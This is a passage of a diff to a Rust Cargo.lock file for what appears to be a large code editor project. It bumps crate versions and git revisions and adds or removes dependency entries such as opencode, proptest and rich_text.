-11427,6 +11649,20 @@ dependencies = [ "thiserror 2.0.17", ] +[[package]] +name = "opencode" +version = "0.1.0" +dependencies = [ + "anyhow", + "futures 0.3.32", + "google_ai", + "http_client", + "schemars", + "serde", + "serde_json", + "strum 0.27.2", +] + [[package]] name = "opener" version = "0.7.2" @@ -11462,7 +11698,7 @@ checksum = "a948666b637a0f465e8564c73e89d4dde00d72d4d473cc972f390fc3dcee7d9c" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11491,7 +11727,7 @@ checksum = "969ccca8ffc4fb105bd131a228107d5c9dd89d9d627edf3295cbe979156f9712" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11549,7 +11785,7 @@ dependencies = [ "proc-macro2", "proc-macro2-diagnostics", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11571,8 +11807,7 @@ dependencies = [ "settings", "smol", "theme", - "tree-sitter-rust", - "tree-sitter-typescript", + "theme_settings", "ui", "util", "workspace", @@ -11605,6 +11840,7 @@ dependencies = [ "smallvec", "smol", "theme", + "theme_settings", "ui", "util", "workspace", @@ -11659,7 +11895,7 @@ dependencies = [ "by_address", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11922,7 +12158,7 @@ dependencies = [ "pest_meta", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11938,7 +12174,7 @@ dependencies = [ [[package]] name = "pet" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "clap", "env_logger 0.10.2", @@ -11969,14 +12205,18 @@ dependencies = [ "pet-virtualenvwrapper", "pet-windows-registry", "pet-windows-store", + "pet-winpython", "serde", "serde_json", + "tracing", + 
"tracing-subscriber", + "winresource", ] [[package]] name = "pet-conda" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -11986,6 +12226,7 @@ dependencies = [ "pet-fs", "pet-python-utils", "pet-reporter", + "rayon", "regex", "serde", "serde_json", @@ -11995,7 +12236,7 @@ dependencies = [ [[package]] name = "pet-core" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "clap", "lazy_static", @@ -12010,7 +12251,7 @@ dependencies = [ [[package]] name = "pet-env-var-path" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12026,8 +12267,9 @@ dependencies = [ [[package]] name = "pet-fs" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ + "glob", "log", "msvc_spectre_libs", "windows-sys 0.59.0", @@ -12036,7 
+12278,7 @@ dependencies = [ [[package]] name = "pet-global-virtualenvs" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12049,7 +12291,7 @@ dependencies = [ [[package]] name = "pet-homebrew" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12059,6 +12301,7 @@ dependencies = [ "pet-fs", "pet-python-utils", "pet-virtualenv", + "rayon", "regex", "serde", "serde_json", @@ -12067,7 +12310,7 @@ dependencies = [ [[package]] name = "pet-jsonrpc" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "log", @@ -12080,7 +12323,7 @@ dependencies = [ [[package]] name = "pet-linux-global-python" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12093,7 +12336,7 @@ 
dependencies = [ [[package]] name = "pet-mac-commandlinetools" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12106,7 +12349,7 @@ dependencies = [ [[package]] name = "pet-mac-python-org" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12119,7 +12362,7 @@ dependencies = [ [[package]] name = "pet-mac-xcode" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12132,20 +12375,22 @@ dependencies = [ [[package]] name = "pet-pipenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ + "lazy_static", "log", "msvc_spectre_libs", "pet-core", "pet-fs", "pet-python-utils", "pet-virtualenv", + "regex", ] [[package]] name = "pet-pixi" version = "0.1.0" -source = 
"git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12157,7 +12402,7 @@ dependencies = [ [[package]] name = "pet-poetry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "base64 0.22.1", "lazy_static", @@ -12178,7 +12423,7 @@ dependencies = [ [[package]] name = "pet-pyenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12196,7 +12441,7 @@ dependencies = [ [[package]] name = "pet-python-utils" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12213,7 +12458,7 @@ dependencies = [ [[package]] name = "pet-reporter" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = 
"git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "log", @@ -12227,7 +12472,7 @@ dependencies = [ [[package]] name = "pet-telemetry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12242,7 +12487,7 @@ dependencies = [ [[package]] name = "pet-uv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "pet-core", @@ -12254,7 +12499,7 @@ dependencies = [ [[package]] name = "pet-venv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12266,7 +12511,7 @@ dependencies = [ [[package]] name = "pet-virtualenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", 
"msvc_spectre_libs", @@ -12278,7 +12523,7 @@ dependencies = [ [[package]] name = "pet-virtualenvwrapper" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12291,7 +12536,7 @@ dependencies = [ [[package]] name = "pet-windows-registry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12309,7 +12554,7 @@ dependencies = [ [[package]] name = "pet-windows-store" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12322,6 +12567,20 @@ dependencies = [ "winreg 0.55.0", ] +[[package]] +name = "pet-winpython" +version = "0.1.0" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" +dependencies = [ + "lazy_static", + "log", + "pet-core", + "pet-fs", + "pet-python-utils", + "pet-virtualenv", + "regex", +] + [[package]] name = "petgraph" version = "0.6.5" @@ -12401,7 +12660,7 @@ dependencies = [ "phf_shared 0.11.3", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ 
-12414,7 +12673,7 @@ dependencies = [ "phf_shared 0.12.1", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12440,15 +12699,14 @@ name = "picker" version = "0.1.0" dependencies = [ "anyhow", - "ctor", "editor", - "env_logger 0.11.8", "gpui", "menu", "schemars", "serde", - "serde_json", + "settings", "theme", + "theme_settings", "ui", "ui_input", "workspace", @@ -12478,7 +12736,7 @@ checksum = "6e918e4ff8c4549eb882f14b3a4bc8c8bc93de829416eacf579f1207a8fbf861" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12557,6 +12815,7 @@ dependencies = [ "settings", "smallvec", "theme", + "theme_settings", "ui", "windows 0.61.3", "workspace", @@ -12709,7 +12968,7 @@ checksum = "af3fb618632874fb76937c2361a7f22afd393c982a2165595407edc75b06d3c1" dependencies = [ "atomic", "crossbeam-queue", - "futures 0.3.31", + "futures 0.3.32", "log", "parking_lot", "pin-project", @@ -12802,7 +13061,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "479ca8adacdd7ce8f1fb39ce9ecccbfe93a3f1344b3d0d97f20bc0196208f62b" dependencies = [ "proc-macro2", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12866,7 +13125,7 @@ dependencies = [ "proc-macro-error-attr2", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12886,19 +13145,20 @@ checksum = "af066a9c399a26e020ada66a034357a868728e72cd426f3adcd35f80d88d88c8" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "version_check", "yansi", ] [[package]] name = "procfs-core" -version = "0.16.0" +version = "0.17.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2d3554923a69f4ce04c4a754260c338f505ce22642d3830e049a399fc2059a29" +checksum = "239df02d8349b06fc07398a3a1697b06418223b1c7725085e801e7c0fc6a12ec" dependencies = [ "bitflags 2.10.0", "hex", + "serde", ] [[package]] @@ -12917,7 +13177,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = 
"52717f9a02b6965224f95ca2a81e2e0c5c43baacd28ca057577988930b6c3d5b" dependencies = [ "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -12935,14 +13195,13 @@ dependencies = [ "clock", "collections", "context_server", + "credentials_provider", "dap", - "dap_adapters", - "db", "encoding_rs", "extension", - "fancy-regex", + "fancy-regex 0.17.0", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "git", "git2", @@ -12960,6 +13219,7 @@ dependencies = [ "node_runtime", "parking_lot", "paths", + "percent-encoding", "postage", "prettier", "pretty_assertions", @@ -12994,6 +13254,7 @@ dependencies = [ "wax", "which 6.0.3", "worktree", + "zed_credentials_provider", "zeroize", "zlog", "ztracing", @@ -13007,7 +13268,7 @@ dependencies = [ "askpass", "clap", "client", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_platform", "http_client", @@ -13031,8 +13292,8 @@ dependencies = [ "collections", "command_palette_hooks", "criterion", - "db", "editor", + "feature_flags", "file_icons", "git", "git_ui", @@ -13054,6 +13315,7 @@ dependencies = [ "telemetry", "tempfile", "theme", + "theme_settings", "ui", "util", "workspace", @@ -13067,7 +13329,7 @@ version = "0.1.0" dependencies = [ "anyhow", "editor", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "language", @@ -13080,6 +13342,7 @@ dependencies = [ "serde_json", "settings", "theme", + "theme_settings", "util", "workspace", ] @@ -13108,7 +13371,7 @@ dependencies = [ "chrono", "collections", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "handlebars 4.5.0", @@ -13126,6 +13389,47 @@ dependencies = [ "uuid", ] +[[package]] +name = "proptest" +version = "1.10.0" +source = "git+https://github.com/proptest-rs/proptest?rev=3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b#3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b" +dependencies = [ + "bit-set 0.8.0", + "bit-vec 0.8.0", + "bitflags 2.10.0", + "num-traits", + "proptest-macro", + "rand 0.9.2", + "rand_chacha 0.9.0", + "rand_xorshift", + "regex-syntax", + 
"rusty-fork", + "tempfile", + "unarray", +] + +[[package]] +name = "proptest-derive" +version = "0.8.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c57924a81864dddafba92e1bf92f9bf82f97096c44489548a60e888e1547549b" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "proptest-macro" +version = "0.5.0" +source = "git+https://github.com/proptest-rs/proptest?rev=3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b#3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b" +dependencies = [ + "convert_case 0.11.0", + "proc-macro2", + "quote", + "syn 2.0.117", +] + [[package]] name = "prost" version = "0.9.0" @@ -13157,7 +13461,7 @@ dependencies = [ "itertools 0.10.5", "lazy_static", "log", - "multimap 0.8.3", + "multimap", "petgraph", "prost 0.9.0", "prost-types 0.9.0", @@ -13173,17 +13477,17 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "22505a5c94da8e3b7c2996394d1c933236c4d743e81a410bcca4e6989fc066a4" dependencies = [ "bytes 1.11.1", - "heck 0.4.1", + "heck 0.5.0", "itertools 0.12.1", "log", - "multimap 0.10.1", + "multimap", "once_cell", "petgraph", "prettyplease", "prost 0.12.6", "prost-types 0.12.6", "regex", - "syn 2.0.106", + "syn 2.0.117", "tempfile", ] @@ -13210,7 +13514,7 @@ dependencies = [ "itertools 0.12.1", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -13237,11 +13541,9 @@ name = "proto" version = "0.1.0" dependencies = [ "anyhow", - "collections", "prost 0.9.0", "prost-build 0.9.0", "serde", - "typed-path", ] [[package]] @@ -13266,10 +13568,11 @@ dependencies = [ [[package]] name = "psm" -version = "0.1.27" +version = "0.1.30" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e66fcd288453b748497d8fb18bccc83a16b0518e3906d4b8df0a8d42d93dbb1c" +checksum = "3852766467df634d74f0b2d7819bf8dc483a0eb2e3b0f50f756f9cfe8b0d18d8" dependencies = [ + "ar_archive_writer", "cc", ] @@ -13324,13 +13627,25 @@ checksum = 
"bd348ff538bc9caeda7ee8cad2d1d48236a1f443c1fa3913c6a02fe0043b1dd3" [[package]] name = "pulley-interpreter" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "986beaef947a51d17b42b0ea18ceaa88450d35b6994737065ed505c39172db71" +checksum = "499d922aa0f9faac8d92351416664f1b7acd914008a90fce2f0516d31efddf67" dependencies = [ "cranelift-bitset", "log", - "wasmtime-math", + "pulley-macros", + "wasmtime-internal-math", +] + +[[package]] +name = "pulley-macros" +version = "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a3848fb193d6dffca43a21f24ca9492f22aab88af1223d06bac7f8a0ef405b81" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", ] [[package]] @@ -13377,6 +13692,12 @@ dependencies = [ "bytemuck", ] +[[package]] +name = "quick-error" +version = "1.2.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" + [[package]] name = "quick-error" version = "2.0.1" @@ -13602,6 +13923,15 @@ dependencies = [ "rand_core 0.6.4", ] +[[package]] +name = "rand_xorshift" +version = "0.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "513962919efc330f829edb2535844d1b912b0fbe2ca165d613e4e8788bb05a5a" +dependencies = [ + "rand_core 0.9.3", +] + [[package]] name = "random_choice" version = "0.3.2" @@ -13661,7 +13991,7 @@ dependencies = [ "rand 0.8.5", "rand_chacha 0.3.1", "simd_helpers", - "system-deps", + "system-deps 6.2.2", "thiserror 1.0.69", "v_frame", "wasm-bindgen", @@ -13676,7 +14006,7 @@ dependencies = [ "avif-serialize", "imgref", "loop9", - "quick-error", + "quick-error 2.0.1", "rav1e", "rayon", "rgb", @@ -13706,6 +14036,18 @@ version = "0.6.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "20675572f6f24e9e76ef639bc5552774ed45f1c30e2951e1e99c59888861c539" +[[package]] +name = "raw-window-metal" +version = "1.1.0" 
+source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "40d213455a5f1dc59214213c7330e074ddf8114c9a42411eb890c767357ce135" +dependencies = [ + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-quartz-core", +] + [[package]] name = "rayon" version = "1.11.0" @@ -13778,14 +14120,13 @@ dependencies = [ "anyhow", "askpass", "chrono", - "dap", "db", "dev_container", "editor", "extension", "extension_host", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "http_client", @@ -13876,7 +14217,7 @@ checksum = "b7186006dcb21920990093f30e3dea63b7d6e977bf1256be20c3563a5db070da" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -13969,7 +14310,7 @@ dependencies = [ "base64 0.22.1", "collections", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "log", "parking_lot", @@ -13997,7 +14338,7 @@ dependencies = [ "anyhow", "askpass", "auto_update", - "futures 0.3.31", + "futures 0.3.32", "gpui", "log", "markdown", @@ -14006,7 +14347,7 @@ dependencies = [ "remote", "semver", "settings", - "theme", + "theme_settings", "ui", "ui_input", "workspace", @@ -14027,7 +14368,6 @@ dependencies = [ "collections", "crash-handler", "crashes", - "dap", "dap_adapters", "debug_adapter_extension", "editor", @@ -14036,7 +14376,7 @@ dependencies = [ "extension_host", "fork", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "git2", "git_hosting_providers", @@ -14059,7 +14399,6 @@ dependencies = [ "paths", "pretty_assertions", "project", - "prompt_store", "proto", "rayon", "release_channel", @@ -14076,6 +14415,7 @@ dependencies = [ "sysinfo 0.37.2", "task", "theme", + "theme_settings", "thiserror 2.0.17", "toml 0.8.23", "unindent", @@ -14083,7 +14423,6 @@ dependencies = [ "uuid", "watch", "windows 0.61.3", - "workspace", "worktree", "zlog", ] @@ -14117,10 +14456,9 @@ dependencies = [ "collections", "command_palette_hooks", "editor", - "env_logger 0.11.8", "feature_flags", "file_icons", - "futures 0.3.31", 
+ "futures 0.3.32", "gpui", "html_to_markdown", "http_client", @@ -14142,11 +14480,13 @@ dependencies = [ "serde", "serde_json", "settings", + "shlex", "smol", "telemetry", "terminal", "terminal_view", "theme", + "theme_settings", "tree-sitter-md", "tree-sitter-python", "tree-sitter-typescript", @@ -14172,7 +14512,6 @@ dependencies = [ "http 0.2.12", "http-body 0.4.6", "hyper 0.14.32", - "hyper-rustls 0.24.2", "hyper-tls", "ipnet", "js-sys", @@ -14182,8 +14521,6 @@ dependencies = [ "once_cell", "percent-encoding", "pin-project-lite", - "rustls 0.21.12", - "rustls-native-certs 0.6.3", "rustls-pemfile 1.0.4", "serde", "serde_json", @@ -14192,7 +14529,6 @@ dependencies = [ "system-configuration 0.5.1", "tokio", "tokio-native-tls", - "tokio-rustls 0.24.1", "tower-service", "url", "wasm-bindgen", @@ -14216,16 +14552,22 @@ dependencies = [ "http-body 1.0.1", "http-body-util", "hyper 1.7.0", + "hyper-rustls 0.27.7", "hyper-util", "js-sys", "log", "percent-encoding", "pin-project-lite", + "quinn", + "rustls 0.23.33", + "rustls-native-certs 0.8.2", + "rustls-pki-types", "serde", "serde_json", "serde_urlencoded", "sync_wrapper 1.0.2", "tokio", + "tokio-rustls 0.26.2", "tower 0.5.2", "tower-http 0.6.6", "tower-service", @@ -14241,8 +14583,7 @@ version = "0.1.0" dependencies = [ "anyhow", "bytes 1.11.1", - "futures 0.3.31", - "gpui", + "futures 0.3.32", "gpui_util", "http_client", "http_client_tls", @@ -14259,12 +14600,15 @@ version = "0.45.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a8928798c0a55e03c9ca6c4c6846f76377427d2c1e1f7e6de3c06ae57942df43" dependencies = [ + "gif", + "image-webp", "log", "pico-args", "rgb", "svgtypes", "tiny-skia", "usvg", + "zune-jpeg", ] [[package]] @@ -14287,20 +14631,6 @@ dependencies = [ "bytemuck", ] -[[package]] -name = "rich_text" -version = "0.1.0" -dependencies = [ - "futures 0.3.31", - "gpui", - "language", - "linkify", - "pulldown-cmark 0.13.0", - "theme", - "ui", - "util", -] - [[package]] name = "ring" 
version = "0.17.14" @@ -14385,10 +14715,10 @@ dependencies = [ name = "rope" version = "0.1.0" dependencies = [ - "arrayvec", "criterion", "ctor", "gpui", + "heapless", "log", "rand 0.9.2", "rayon", @@ -14425,7 +14755,7 @@ dependencies = [ "async-tungstenite", "base64 0.22.1", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "parking_lot", "proto", @@ -14496,7 +14826,7 @@ dependencies = [ "rope", "serde", "settings", - "theme", + "theme_settings", "ui", "ui_input", "util", @@ -14506,9 +14836,9 @@ dependencies = [ [[package]] name = "runtimelib" -version = "1.2.0" +version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d80685459e1e5fa5603182058351ae91c98ca458dfef4e85f0a37be4f7cf1e6c" +checksum = "fa84884e45ed4a1e663120cef3fc11f14d1a2a1933776e1c31599f7bd2dd0c9e" dependencies = [ "async-dispatcher", "async-std", @@ -14518,7 +14848,7 @@ dependencies = [ "chrono", "data-encoding", "dirs 6.0.0", - "futures 0.3.31", + "futures 0.3.32", "glob", "jupyter-protocol", "serde", @@ -14532,9 +14862,9 @@ dependencies = [ [[package]] name = "rust-embed" -version = "8.7.2" +version = "8.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "025908b8682a26ba8d12f6f2d66b987584a4a87bc024abc5bbc12553a8cd178a" +checksum = "04113cb9355a377d83f06ef1f0a45b8ab8cd7d8b1288160717d66df5c7988d27" dependencies = [ "rust-embed-impl", "rust-embed-utils", @@ -14543,22 +14873,22 @@ dependencies = [ [[package]] name = "rust-embed-impl" -version = "8.7.2" +version = "8.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6065f1a4392b71819ec1ea1df1120673418bf386f50de1d6f54204d836d4349c" +checksum = "da0902e4c7c8e997159ab384e6d0fc91c221375f6894346ae107f47dd0f3ccaa" dependencies = [ "proc-macro2", "quote", "rust-embed-utils", - "syn 2.0.106", + "syn 2.0.117", "walkdir", ] [[package]] name = "rust-embed-utils" -version = "8.7.2" +version = "8.11.0" source = 
